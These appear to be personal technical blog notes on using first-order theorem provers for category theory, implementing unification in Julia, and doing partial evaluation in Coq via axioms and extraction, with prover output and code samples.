- https://www.cs.le.ac.uk/people/rlc3/research/papers/mgs2015-categoryTheory-exercises.pdf
- https://math.stackexchange.com/questions/54583/looking-for-students-guide-to-diagram-chasing

Some observations on actually using these provers: just because it says proved is not very convincing. It is very easy to have your axioms and/or conjecture stated incorrectly. Forall ! and exists ? bind tighter than I naively expected them to in the syntax. I ended up putting parentheses nearly everywhere, and I had a lot of very difficult-to-debug problems due to bad binding assumptions. Typos are also a disaster, and these things are hard to debug. It is helpful to alternatively ask for satisfiability (disproving the conjecture). One should also at least look at which axioms it’s using; if it is using fewer axioms than makes sense, something is up. These are all good reasons that it might be better to automatically generate these problem files. Ultimately I feel like that is the way to go, because encoding what you’re interested in into first order logic can require some repetitiveness.

Sanity checking my files with http://www.tptp.org/cgi-bin/SystemB4TPTP proved to be helpful. Also helpful: looking at the parenthesis structure in the output.

I think using the typed tff format could also help sanity significantly. It really sucks that a typo on one of your predicates or variables can fail silently.

Even ignoring syntax screwups, the scoping of quantifiers is tough to think about.

I suspect that these systems will be very good for proofs that amount to unrolling definitions.

What is the best formulation for category theory properties?

An interesting property is that these provers seem to want a time limit given to them, and they schedule themselves in such a way as to use the full time limit, even if they shouldn’t need it.

Categorical “type checking” appears as an external predicate: in order to compose, morphisms need to meet on an intermediate object.

The proof output is rather difficult to read. It is the equivalent of trying to read assembly code. The high level structure has been transformed into something more amenable to the machine, and many names have been mangled. This proof is short enough that I think a person could stare at it for a while and eventually kind of understand it.

Perhaps we want to directly input our constructions in cnf form with skolemization manually applied. This might make the output more readable?

In terms of automated category theory proving, I’m not aware of that much work, but there must be more that I don’t know how to find.

- https://www.cs.cornell.edu/~kozen/Papers/06ijcar-categories.pdf
- https://www.cambridge.org/core/books/categories-and-computer-science/203EBBEE29BEADB035C9DD80191E67B1
- http://www.cs.man.ac.uk/~david/categories/book/book.pdf

Example proof term: Is this even right? Hard to know.

```
# Proof found!
# SZS status Theorem
# SZS output start CNFRefutation
fof(pullback_monic, conjecture, ![X11, X13, X14]:((monic(X11)&pullback(cod(X11),X11,X13,X14))=>monic(X14)), file('properties.tptp', pullback_monic)).
fof(pullback_def, axiom, ![X2, X3, X13, X14]:(pullback(X2,X3,X13,X14)<=>(commute_square(X2,X13,X3,X14)&![X15, X16]:(commute_square(X2,X15,X3,X16)=>?[X17]:![X18]:((comp(X13,X18,X15)&comp(X14,X18,X16))<=>X18=X17)))), file('properties.tptp', pullback_def)).
fof(commute_square_def, axiom, ![X2, X3, X7, X12]:(commute_square(X2,X3,X7,X12)<=>?[X11]:(comp(X2,X3,X11)&comp(X7,X12,X11))), file('properties.tptp', commute_square_def)).
fof(comp_objects_middle, axiom, ![X2, X3]:(?[X6]:comp(X2,X3,X6)<=>dom(X2)=cod(X3)), file('cat.tptp', comp_objects_middle)).
fof(dom_cod, axiom, ![X1]:dom(cod(X1))=cod(X1), file('cat.tptp', dom_cod)).
fof(left_id, axiom, ![X2]:comp(cod(X2),X2,X2), file('cat.tptp', left_id)).
fof(comp_is_unique, axiom, ![X2, X3, X4, X5]:((comp(X2,X3,X4)&comp(X2,X3,X5))=>X4=X5), file('cat.tptp', comp_is_unique)).
fof(monic_def, axiom, ![X11]:(monic(X11)<=>![X2, X3]:(?[X7]:(comp(X11,X2,X7)&comp(X11,X3,X7))=>X2=X3)), file('properties.tptp', monic_def)).
fof(comp_cod, axiom, ![X2, X3, X6]:(comp(X2,X3,X6)=>cod(X2)=cod(X6)), file('cat.tptp', comp_cod)).
fof(comp_dom, axiom, ![X2, X3, X6]:(comp(X2,X3,X6)=>dom(X3)=dom(X6)), file('cat.tptp', comp_dom)).
fof(comp_assoc, axiom, ![X2, X3, X7, X6, X8, X9, X10]:((((comp(X2,X3,X6)&comp(X6,X7,X9))&comp(X2,X8,X10))&comp(X3,X7,X8))=>X9=X10), file('cat.tptp', comp_assoc)).
fof(c_0_11, negated_conjecture, ~(![X11, X13, X14]:((monic(X11)&pullback(cod(X11),X11,X13,X14))=>monic(X14))), inference(assume_negation,[status(cth)],[pullback_monic])).
fof(c_0_12, plain, ![X68, X69, X70, X71, X72, X73, X75, X76, X77, X78, X79, X80, X83]:(((commute_square(X68,X70,X69,X71)|~pullback(X68,X69,X70,X71))&((~comp(X70,X75,X72)|~comp(X71,X75,X73)|X75=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71))&((comp(X70,X76,X72)|X76!=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71))&(comp(X71,X76,X73)|X76!=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71)))))&((commute_square(X77,esk8_4(X77,X78,X79,X80),X78,esk9_4(X77,X78,X79,X80))|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&((~comp(X79,esk10_5(X77,X78,X79,X80,X83),esk8_4(X77,X78,X79,X80))|~comp(X80,esk10_5(X77,X78,X79,X80,X83),esk9_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)!=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&((comp(X79,esk10_5(X77,X78,X79,X80,X83),esk8_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&(comp(X80,esk10_5(X77,X78,X79,X80,X83),esk9_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80)))))), inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[pullback_def])])])])])])).
fof(c_0_13, negated_conjecture, ((monic(esk11_0)&pullback(cod(esk11_0),esk11_0,esk12_0,esk13_0))&~monic(esk13_0)), inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[c_0_11])])])).
fof(c_0_14, plain, ![X58, X59, X60, X61, X63, X64, X65, X66, X67]:(((comp(X58,X59,esk6_4(X58,X59,X60,X61))|~commute_square(X58,X59,X60,X61))&(comp(X60,X61,esk6_4(X58,X59,X60,X61))|~commute_square(X58,X59,X60,X61)))&(~comp(X63,X64,X67)|~comp(X65,X66,X67)|commute_square(X63,X64,X65,X66))), inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[commute_square_def])])])])])])).
cnf(c_0_15, plain, (commute_square(X1,X2,X3,X4)|~pullback(X1,X3,X2,X4)), inference(split_conjunct,[status(thm)],[c_0_12])).
cnf(c_0_16, negated_conjecture, (pullback(cod(esk11_0),esk11_0,esk12_0,esk13_0)), inference(split_conjunct,[status(thm)],[c_0_13])).
fof(c_0_17, plain, ![X25, X26, X27, X28, X29]:((~comp(X25,X26,X27)|dom(X25)=cod(X26))&(dom(X28)!=cod(X29)|comp(X28,X29,esk1_2(X28,X29)))), inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_objects_middle])])])])])).
cnf(c_0_18, plain, (comp(X1,X2,esk6_4(X1,X2,X3,X4))|~commute_square(X1,X2,X3,X4)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_19, negated_conjecture, (commute_square(cod(esk11_0),esk12_0,esk11_0,esk13_0)), inference(spm,[status(thm)],[c_0_15, c_0_16])).
fof(c_0_20, plain, ![X19]:dom(cod(X19))=cod(X19), inference(variable_rename,[status(thm)],[dom_cod])).
fof(c_0_21, plain, ![X37]:comp(cod(X37),X37,X37), inference(variable_rename,[status(thm)],[left_id])).
cnf(c_0_22, plain, (dom(X1)=cod(X2)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_17])).
cnf(c_0_23, negated_conjecture, (comp(cod(esk11_0),esk12_0,esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0))), inference(spm,[status(thm)],[c_0_18, c_0_19])).
cnf(c_0_24, plain, (dom(cod(X1))=cod(X1)), inference(split_conjunct,[status(thm)],[c_0_20])).
fof(c_0_25, plain, ![X21, X22, X23, X24]:(~comp(X21,X22,X23)|~comp(X21,X22,X24)|X23=X24), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_is_unique])])).
cnf(c_0_26, plain, (comp(cod(X1),X1,X1)), inference(split_conjunct,[status(thm)],[c_0_21])).
cnf(c_0_27, negated_conjecture, (cod(esk12_0)=cod(esk11_0)), inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_22, c_0_23]), c_0_24])).
fof(c_0_28, plain, ![X46, X47, X48, X49, X50]:((~monic(X46)|(~comp(X46,X47,X49)|~comp(X46,X48,X49)|X47=X48))&(((comp(X50,esk2_1(X50),esk4_1(X50))|monic(X50))&(comp(X50,esk3_1(X50),esk4_1(X50))|monic(X50)))&(esk2_1(X50)!=esk3_1(X50)|monic(X50)))), inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[monic_def])])])])])])).
cnf(c_0_29, plain, (X3=X4|~comp(X1,X2,X3)|~comp(X1,X2,X4)), inference(split_conjunct,[status(thm)],[c_0_25])).
cnf(c_0_30, negated_conjecture, (comp(cod(esk11_0),esk12_0,esk12_0)), inference(spm,[status(thm)],[c_0_26, c_0_27])).
fof(c_0_31, plain, ![X34, X35, X36]:(~comp(X34,X35,X36)|cod(X34)=cod(X36)), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_cod])])).
cnf(c_0_32, negated_conjecture, (~monic(esk13_0)), inference(split_conjunct,[status(thm)],[c_0_13])).
cnf(c_0_33, plain, (comp(X1,esk2_1(X1),esk4_1(X1))|monic(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_34, plain, (comp(X1,X2,esk6_4(X3,X4,X1,X2))|~commute_square(X3,X4,X1,X2)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_35, plain, (comp(X1,esk3_1(X1),esk4_1(X1))|monic(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_36, negated_conjecture, (X1=esk12_0|~comp(cod(esk11_0),esk12_0,X1)), inference(spm,[status(thm)],[c_0_29, c_0_30])).
cnf(c_0_37, plain, (cod(X1)=cod(X3)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_31])).
cnf(c_0_38, negated_conjecture, (comp(esk13_0,esk2_1(esk13_0),esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_32, c_0_33])).
cnf(c_0_39, negated_conjecture, (comp(esk11_0,esk13_0,esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0))), inference(spm,[status(thm)],[c_0_34, c_0_19])).
cnf(c_0_40, negated_conjecture, (comp(esk13_0,esk3_1(esk13_0),esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_32, c_0_35])).
fof(c_0_41, plain, ![X31, X32, X33]:(~comp(X31,X32,X33)|dom(X32)=dom(X33)), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_dom])])).
cnf(c_0_42, negated_conjecture, (esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0)=esk12_0), inference(spm,[status(thm)],[c_0_36, c_0_23])).
cnf(c_0_43, negated_conjecture, (cod(esk4_1(esk13_0))=cod(esk13_0)), inference(spm,[status(thm)],[c_0_37, c_0_38])).
cnf(c_0_44, negated_conjecture, (cod(esk13_0)=dom(esk11_0)), inference(spm,[status(thm)],[c_0_22, c_0_39])).
cnf(c_0_45, plain, (comp(X1,X2,esk1_2(X1,X2))|dom(X1)!=cod(X2)), inference(split_conjunct,[status(thm)],[c_0_17])).
cnf(c_0_46, negated_conjecture, (cod(esk3_1(esk13_0))=dom(esk13_0)), inference(spm,[status(thm)],[c_0_22, c_0_40])).
cnf(c_0_47, plain, (dom(X2)=dom(X3)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_41])).
cnf(c_0_48, negated_conjecture, (comp(esk11_0,esk13_0,esk12_0)), inference(rw,[status(thm)],[c_0_39, c_0_42])).
cnf(c_0_49, negated_conjecture, (cod(esk4_1(esk13_0))=dom(esk11_0)), inference(rw,[status(thm)],[c_0_43, c_0_44])).
fof(c_0_50, plain, ![X39, X40, X41, X42, X43, X44, X45]:(~comp(X39,X40,X42)|~comp(X42,X41,X44)|~comp(X39,X43,X45)|~comp(X40,X41,X43)|X44=X45), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_assoc])])).
cnf(c_0_51, negated_conjecture, (comp(X1,esk3_1(esk13_0),esk1_2(X1,esk3_1(esk13_0)))|dom(X1)!=dom(esk13_0)), inference(spm,[status(thm)],[c_0_45, c_0_46])).
cnf(c_0_52, negated_conjecture, (dom(esk12_0)=dom(esk13_0)), inference(spm,[status(thm)],[c_0_47, c_0_48])).
cnf(c_0_53, negated_conjecture, (comp(X1,esk4_1(esk13_0),esk1_2(X1,esk4_1(esk13_0)))|dom(X1)!=dom(esk11_0)), inference(spm,[status(thm)],[c_0_45, c_0_49])).
cnf(c_0_54, plain, (X5=X7|~comp(X1,X2,X3)|~comp(X3,X4,X5)|~comp(X1,X6,X7)|~comp(X2,X4,X6)), inference(split_conjunct,[status(thm)],[c_0_50])).
cnf(c_0_55, negated_conjecture, (comp(esk12_0,esk3_1(esk13_0),esk1_2(esk12_0,esk3_1(esk13_0)))), inference(spm,[status(thm)],[c_0_51, c_0_52])).
cnf(c_0_56, negated_conjecture, (cod(esk2_1(esk13_0))=dom(esk13_0)), inference(spm,[status(thm)],[c_0_22, c_0_38])).
cnf(c_0_57, plain, (commute_square(X1,X2,X4,X5)|~comp(X1,X2,X3)|~comp(X4,X5,X3)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_58, negated_conjecture, (comp(esk11_0,esk4_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(er,[status(thm)],[c_0_53])).
cnf(c_0_59, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=X1|~comp(X2,esk3_1(esk13_0),X3)|~comp(X4,X2,esk12_0)|~comp(X4,X3,X1)), inference(spm,[status(thm)],[c_0_54, c_0_55])).
cnf(c_0_60, negated_conjecture, (comp(X1,esk2_1(esk13_0),esk1_2(X1,esk2_1(esk13_0)))|dom(X1)!=dom(esk13_0)), inference(spm,[status(thm)],[c_0_45, c_0_56])).
cnf(c_0_61, plain, (X2=esk7_6(X6,X7,X1,X4,X3,X5)|~comp(X1,X2,X3)|~comp(X4,X2,X5)|~commute_square(X6,X3,X7,X5)|~pullback(X6,X7,X1,X4)), inference(split_conjunct,[status(thm)],[c_0_12])).
cnf(c_0_62, negated_conjecture, (commute_square(X1,X2,esk11_0,esk4_1(esk13_0))|~comp(X1,X2,esk1_2(esk11_0,esk4_1(esk13_0)))), inference(spm,[status(thm)],[c_0_57, c_0_58])).
cnf(c_0_63, negated_conjecture, (cod(esk1_2(esk11_0,esk4_1(esk13_0)))=cod(esk11_0)), inference(spm,[status(thm)],[c_0_37, c_0_58])).
cnf(c_0_64, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))|~comp(X1,esk3_1(esk13_0),esk4_1(esk13_0))|~comp(esk11_0,X1,esk12_0)), inference(spm,[status(thm)],[c_0_59, c_0_58])).
cnf(c_0_65, negated_conjecture, (comp(esk12_0,esk2_1(esk13_0),esk1_2(esk12_0,esk2_1(esk13_0)))), inference(spm,[status(thm)],[c_0_60, c_0_52])).
cnf(c_0_66, negated_conjecture, (X1=esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,X2,X3)|~commute_square(cod(esk11_0),X2,esk11_0,X3)|~comp(esk13_0,X1,X3)|~comp(esk12_0,X1,X2)), inference(spm,[status(thm)],[c_0_61, c_0_16])).
cnf(c_0_67, negated_conjecture, (commute_square(cod(esk11_0),esk1_2(esk11_0,esk4_1(esk13_0)),esk11_0,esk4_1(esk13_0))), inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_62, c_0_26]), c_0_63])).
cnf(c_0_68, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_64, c_0_48]), c_0_40])])).
cnf(c_0_69, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=X1|~comp(X2,esk2_1(esk13_0),X3)|~comp(X4,X2,esk12_0)|~comp(X4,X3,X1)), inference(spm,[status(thm)],[c_0_54, c_0_65])).
cnf(c_0_70, negated_conjecture, (X1=esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,esk1_2(esk11_0,esk4_1(esk13_0)),esk4_1(esk13_0))|~comp(esk12_0,X1,esk1_2(esk11_0,esk4_1(esk13_0)))|~comp(esk13_0,X1,esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_66, c_0_67])).
cnf(c_0_71, negated_conjecture, (comp(esk12_0,esk3_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(rw,[status(thm)],[c_0_55, c_0_68])).
cnf(c_0_72, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))|~comp(X1,esk2_1(esk13_0),esk4_1(esk13_0))|~comp(esk11_0,X1,esk12_0)), inference(spm,[status(thm)],[c_0_69, c_0_58])).
cnf(c_0_73, negated_conjecture, (esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,esk1_2(esk11_0,esk4_1(esk13_0)),esk4_1(esk13_0))=esk3_1(esk13_0)), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_70, c_0_40]), c_0_71])])).
cnf(c_0_74, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_72, c_0_48]), c_0_38])])).
cnf(c_0_75, negated_conjecture, (X1=esk3_1(esk13_0)|~comp(esk12_0,X1,esk1_2(esk11_0,esk4_1(esk13_0)))|~comp(esk13_0,X1,esk4_1(esk13_0))), inference(rw,[status(thm)],[c_0_70, c_0_73])).
cnf(c_0_76, negated_conjecture, (comp(esk12_0,esk2_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(rw,[status(thm)],[c_0_65, c_0_74])).
cnf(c_0_77, plain, (monic(X1)|esk2_1(X1)!=esk3_1(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_78, negated_conjecture, (esk3_1(esk13_0)=esk2_1(esk13_0)), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_75, c_0_38]), c_0_76])])).
cnf(c_0_79, negated_conjecture, ($false), inference(sr,[status(thm)],[inference(spm,[status(thm)],[c_0_77, c_0_78]), c_0_32]), ['proof']).
# SZS output end CNFRefutation
# Proof object total steps : 80
# Proof object clause steps : 57
# Proof object formula steps : 23
# Proof object conjectures : 44
# Proof object clause conjectures : 41
# Proof object formula conjectures : 3
# Proof object initial clauses used : 18
# Proof object initial formulas used : 11
# Proof object generating inferences : 34
# Proof object simplifying inferences : 16
# Training examples: 0 positive, 0 negative
# Parsed axioms : 14
# Removed by relevancy pruning/SinE : 0
# Initial clauses : 31
# Removed in clause preprocessing : 0
# Initial clauses in saturation : 31
# Processed clauses : 4871
# ...of these trivial : 248
# ...subsumed : 2833
# ...remaining for further processing : 1790
# Other redundant clauses eliminated : 2
# Clauses deleted for lack of memory : 0
# Backward-subsumed : 68
# Backward-rewritten : 917
# Generated clauses : 12894
# ...of the previous two non-trivial : 12112
# Contextual simplify-reflections : 0
# Paramodulations : 12870
# Factorizations : 0
# Equation resolutions : 24
# Propositional unsat checks : 0
# Propositional check models : 0
# Propositional check unsatisfiable : 0
# Propositional clauses : 0
# Propositional clauses after purity: 0
# Propositional unsat core size : 0
# Propositional preprocessing time : 0.000
# Propositional encoding time : 0.000
# Propositional solver time : 0.000
# Success case prop preproc time : 0.000
# Success case prop encoding time : 0.000
# Success case prop solver time : 0.000
# Current number of processed clauses : 772
# Positive orientable unit clauses : 155
# Positive unorientable unit clauses: 0
# Negative unit clauses : 1
# Non-unit-clauses : 616
# Current number of unprocessed clauses: 5468
# ...number of literals in the above : 16715
# Current number of archived formulas : 0
# Current number of archived clauses : 1016
# Clause-clause subsumption calls (NU) : 303883
# Rec. Clause-clause subsumption calls : 253866
# Non-unit clause-clause subsumptions : 2890
# Unit Clause-clause subsumption calls : 1530
# Rewrite failures with RHS unbound : 0
# BW rewrite match attempts : 1110
# BW rewrite match successes : 80
# Condensation attempts : 0
# Condensation successes : 0
# Termbank termtop insertions : 267453
```

Unification is a sister to pattern matching, but it has an intrinsic bidirectional flavor that makes it feel more powerful and declarative.

Unification can be implemented efficiently (not that I have done so yet) with some interesting variants of the disjoint set / union-find data type.
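As a point of reference, here is a minimal union-find sketch of the sort those efficient implementations build on (just the data structure, with path compression; not a unifier, and the names are mine):

```
# parent[i] points toward the representative of i's equivalence class
struct UnionFind
    parent::Vector{Int}
end
UnionFind(n::Int) = UnionFind(collect(1:n))

function find(uf::UnionFind, i::Int)
    while uf.parent[i] != i
        uf.parent[i] = uf.parent[uf.parent[i]] # path halving
        i = uf.parent[i]
    end
    return i
end

# merge the equivalence classes of i and j
unite!(uf::UnionFind, i::Int, j::Int) = (uf.parent[find(uf, i)] = find(uf, j); uf)
```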

- The magic of Prolog is basically built-in unification + backtracking search.
- The magic of polymorphic type inference in Haskell and OCaml comes from unification of type variables.
- Part of the magic of SMT solvers using the theory of uninterpreted functions is unification.
- Automatic and interactive theorem provers have unification built in somewhere.

To describe terms I made simple data types modeled on those in SymbolicUtils (I probably should just *use* the definitions in SymbolicUtils, but I was trying to keep it simple).

```
# variables
struct Sym
    name::Symbol
end
# compound terms: a head symbol applied to arguments
struct Term
    f::Symbol
    arguments::Array{Any} # Array{Union{Term,Sym}} faster/better?
end
```

The implementation by Norvig and Russell for their AI book is an often-copied, simple implementation of unification. It is small and kind of straightforward: you travel down the syntax trees, and when you hit variables you try to put them into your substitution dictionary. Although, like anything that touches substitution, it can be easy to get wrong. See his note below.

I used multiple dispatch as a kind of pattern matching on algebraic data types, to case on whether the arguments are terms or variables. It’s kind of nice, but unclear to me whether it is obscenely slow or not. This is not a high performance implementation of unification in any case.

```
# occur_check returns true if variable x occurs somewhere inside y
# (walking through the substitution s). Binding x to a term containing x
# would build an infinite term, so unify fails in that case.
occur_check(x::Sym, y::Term, s) = any(occur_check(x, a, s) for a in y.arguments)
function occur_check(x::Sym, y::Sym, s)
    if x == y
        return true
    elseif haskey(s, y)
        return occur_check(x, s[y], s)
    else
        return false
    end
end
function unify(x::Sym, y::Union{Sym,Term}, s)
    if x == y
        return s
    elseif haskey(s, x)
        return unify(s[x], y, s)
    elseif haskey(s, y) # This is the Norvig twist
        return unify(x, s[y], s)
    elseif occur_check(x, y, s)
        return nothing
    else
        s[x] = y
        return s
    end
end
unify(x::Term, y::Sym, s) = unify(y, x, s)
function unify(x::Term, y::Term, s)
    if x.f == y.f && length(x.arguments) == length(y.arguments)
        for (x1, y1) in zip(x.arguments, y.arguments)
            if unify(x1, y1, s) === nothing
                return nothing
            end
        end
        return s
    else
        return nothing
    end
end
unify(x, y) = unify(x, y, Dict())
```

I also made a small macro for converting simple Julia expressions to my representation. It uses the Prolog convention that names starting with a capital letter are variables.

```
function string2term(x)
    if x isa Symbol
        name = String(x)
        if isuppercase(name[1])
            return Sym(x)
        else
            return Term(x, [])
        end
    elseif x isa Expr
        @assert x.head == :call
        arguments = [string2term(y) for y in x.args[2:end]]
        return Term(x.args[1], arguments)
    end
end
macro string2term(x)
    return :($(string2term(x)))
end
print(unify( @string2term(p(X,g(a), f(a, f(a)))) , @string2term(p(f(a), g(Y), f(Y, Z)))))
# Dict{Any,Any}(Sym(:X) => Term(:f, Any[Term(:a, Any[])]),Sym(:Y) => Term(:a, Any[]),Sym(:Z) => Term(:f, Any[Term(:a, Any[])]))
```

Unification: Multidisciplinary Survey by Knight https://kevincrawfordknight.github.io/papers/unification-knight.pdf

https://github.com/roberthoenig/FirstOrderLogic.jl/tree/master/src A julia project for first order logic that also has a unification implementation, and other stuff

An interesting category theoretic perspective on unification: “What is Unification?” by Goguen http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.48.3615

There is also a slightly hidden implementation in sympy (it does not appear in the docs?) http://matthewrocklin.com/blog/work/2012/11/01/Unification https://github.com/sympy/sympy/tree/master/sympy/unify

PyRes https://github.com/eprover/PyRes/blob/master/unification.py

Norvig unify

https://github.com/aimacode/aima-python/blob/9ea91c1d3a644fdb007e8dd0870202dcd9d078b6/logic4e.py#L1307

Norvig – widespread error

http://norvig.com/unify-bug.pdf

Efficient unification note

ftp://ftp.cs.indiana.edu/pub/techreports/TR242.pdf

blog post

https://eli.thegreenplace.net/2018/unification/

Efficient representations for triangular substitutions

https://users.soe.ucsc.edu/~lkuper/papers/walk.pdf

Conor McBride – first order substitution, structurally recursive dependent types

http://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=880725E316FA5E3540EFAD83C0C2FD88?doi=10.1.1.25.1516&rep=rep1&type=pdf

z3 unifier – an example of an actually performant unifier

https://github.com/Z3Prover/z3/blob/520ce9a5ee6079651580b6d83bc2db0f342b8a20/src/ast/substitution/unifier.cpp

Warren Abstract Machine Tutorial Reconstruction http://wambook.sourceforge.net/wambook.pdf

Handbook of Automated Reasoning – has a chapter on unification

Higher Order Unification – LambdaProlog, Miller unification

Syntax trees with variables in them are a way to represent sets of terms (possibly infinite sets!). In that sense one can ask whether we can form the union or intersection of these sets. The intersection is given by the most general unifier. The union is not expressible via a single term with variables in general; we can only over-approximate it, like how the union of convex sets is not necessarily convex but its hull is. This is a join on a term lattice, and computing it is the process of anti-unification.
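Here is a minimal sketch of anti-unification (least general generalization) over the `Sym`/`Term` types above; it is my own toy version. Where the two terms disagree we generalize to a variable, and the dictionary reuses that variable when the same pair of mismatched subterms shows up again (a real version would want structural equality on that pair).

```
function anti_unify(x, y, s=Dict())
    if x isa Term && y isa Term && x.f == y.f && length(x.arguments) == length(y.arguments)
        # heads agree: generalize argument-wise
        return Term(x.f, [anti_unify(x1, y1, s) for (x1, y1) in zip(x.arguments, y.arguments)])
    else
        # disagreement: map this pair of subterms to a shared fresh variable
        haskey(s, (x, y)) || (s[(x, y)] = Sym(gensym(:V)))
        return s[(x, y)]
    end
end
# anti_unify(@string2term(f(a, b)), @string2term(f(c, b))) gives f(V, b) up to renaming
```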

What about the complement of these sets? Not really. With the representation we’ve chosen, we can’t have an interesting negation. What about the difference of two sets?

I had an idea a while back about programming with relations, where I laid out some interesting combinators. I represented only finite relations, as those can be easily enumerated.
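For instance, a finite relation can be represented as a set of pairs, and combinators become small set comprehensions (a toy sketch in that spirit, not the combinators from that post):

```
# compose two finite relations given as sets of pairs
compose(R, S) = Set((a, c) for (a, b1) in R for (b2, c) in S if b1 == b2)
converse(R) = Set((b, a) for (a, b) in R)

R = Set([(1, 2), (2, 3)])
compose(R, R) # Set([(1, 3)])
```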

If one chooses to ignore the proof aspects of Coq for a moment, it becomes a bizarre Ocaml metaprogramming system on insane steroids. Coq has very powerful evaluation mechanisms built in. Why not use these to perform partial evaluation?

We had a really fun project at work where we did partial evaluation in Coq and I’ve been tinkering around with how to make the techniques we eventually stumbled onto there less ad hoc feeling.

A problem I encountered is that it is somewhat difficult to get controlled evaluation in Coq. The fastest evaluation tactics, vm_compute and native_compute, do not let you protect values from unfolding. There is a construct that is protected though: axioms added to Coq cannot be unfolded by construction, but can be extracted. So I think a useful mantra here is axioms ~ code.

```
Require Import Extraction.
Axiom PCode : Type -> Type.
Extract Constant PCode "'a" => "'a".
Axiom block : forall {a : Type}, a -> PCode a.
Extract Inlined Constant block => "".
```

It is useful to mark in the type which things you expect to run and which you expect to block execution. You can mark everything that is opaque with the type `PCode`. `block` is a useful combinator. It is *not* a `quote` combinator however, as it will allow evaluation underneath it. Nothing, however, will be able to inspect a blocked piece of code. It’s amusing that the blocking of computation of axioms is exactly what people dislike, but here it is the feature we desire. `PCode` is short for partial code, indicating that it is possible for evaluation to occur within it. We’ll see a `Code` that is more similar to MetaOcaml’s later.

It is a touch fishy to extract `block` as nothing `""` rather than an identity function `(fun x -> x)`. It is rather cute though, and I suspect that you won’t find `block` occurring in a higher order context, although I could easily be wrong (ahhh the sweet dark freedom of ignoring correctness). If this makes you queasy, you can put the function in, which is likely to be compiled away, especially if you use the flambda switch. Not as pretty an output though.

We can play a similar extraction game with two HOAS-ish combinators.

```
Axiom ocaml_lam : forall {a b: Type}, (PCode a -> PCode b) -> PCode (a -> b).
Extract Inlined Constant ocaml_lam => "".
Axiom ocaml_app : forall {a b : Type}, PCode (a -> b) -> PCode a -> PCode b.
Extract Inlined Constant ocaml_app => "".
```

